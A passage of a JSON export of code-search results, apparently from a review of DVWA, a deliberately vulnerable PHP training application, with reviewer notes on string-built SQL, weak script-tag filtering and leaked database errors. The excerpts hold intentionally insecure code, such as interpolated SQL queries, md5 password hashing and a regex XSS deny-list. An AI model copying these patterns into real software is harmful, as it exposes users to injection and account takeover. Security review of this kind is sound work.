  "match": "<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token 
function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span 
class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 171,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">11:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database</span>\n<span class=\"line-number\">17:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">18:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token 
function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span 
class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">21:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 16,
  "start": 11,
  "end": 22,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 297,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/high.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize name input\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">preg_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"INSERT INTO guestbook <span class=\"token punctuation\">(</span> comment<span class=\"token punctuation\">,</span> name <span class=\"token punctuation\">)</span> VALUES <span class=\"token punctuation\">(</span> <span class=\"token string\">'$message'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'$name'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token 
punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token function\">mysql_close</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> }",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
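  "note": "The search hit is the comment on line 17, not a code construct. The INSERT on line 18 is built by string interpolation; $name is passed through mysqli_real_escape_string on line 15, and the handling of $message is outside this excerpt. The preg_replace on line 14 is a deny-list for script tags, not output encoding, so confirm the stored fields are HTML-encoded (htmlspecialchars or equivalent) wherever the guestbook is rendered. Prefer a prepared statement with bound parameters. Line 19 also prints the raw database error to the page on failure."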
 },
 {
  "id": 303,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">16:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize name input\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span 
class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"highlight\"><span class=\"line-number\">21:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'INSERT INTO guestbook <span class=\"token punctuation\">(</span> comment<span class=\"token punctuation\">,</span> name <span class=\"token punctuation\">)</span> VALUES <span class=\"token punctuation\">(</span> <span class=\"token punctuation\">:</span>message<span class=\"token punctuation\">,</span> <span class=\"token 
punctuation\">:</span>name <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':message'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':name'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">26:</span> }",
  "line": 21,
  "start": 16,
  "end": 27,
  "severity": "unknown",
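  "note": "The search hit is the comment on line 21. Lines 22-25 use a PDO prepared statement with bound parameters, and $name goes through htmlspecialchars on line 19, so this excerpt shows no string-built SQL; this is likely a false positive for the search pattern. Handling of $message is outside the excerpt. The mysqli_real_escape_string call on line 18 is redundant before a bound parameter and may leave backslashes in the stored value."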
 },
 {
  "id": 307,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/low.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize name input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token 
punctuation\">,</span>  <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"INSERT INTO guestbook <span class=\"token punctuation\">(</span> comment<span class=\"token punctuation\">,</span> name <span class=\"token punctuation\">)</span> VALUES <span class=\"token punctuation\">(</span> <span class=\"token string\">'$message'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'$name'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token 
punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token 
string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token function\">mysql_close</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> }",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
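  "note": "The search hit is the comment on line 15. In this excerpt $message (line 10) and $name (line 13) receive only mysqli_real_escape_string before being interpolated into the INSERT on line 16; any earlier processing is outside the excerpt. SQL escaping does not neutralise HTML markup, so confirm both fields are HTML-encoded when the guestbook is rendered. Prefer a prepared statement with bound parameters. Line 17 also prints the raw database error to the page on failure."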
 },
 {
  "id": 311,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/medium.php",
  "filetype": "php",
  "search": "\\supdate",
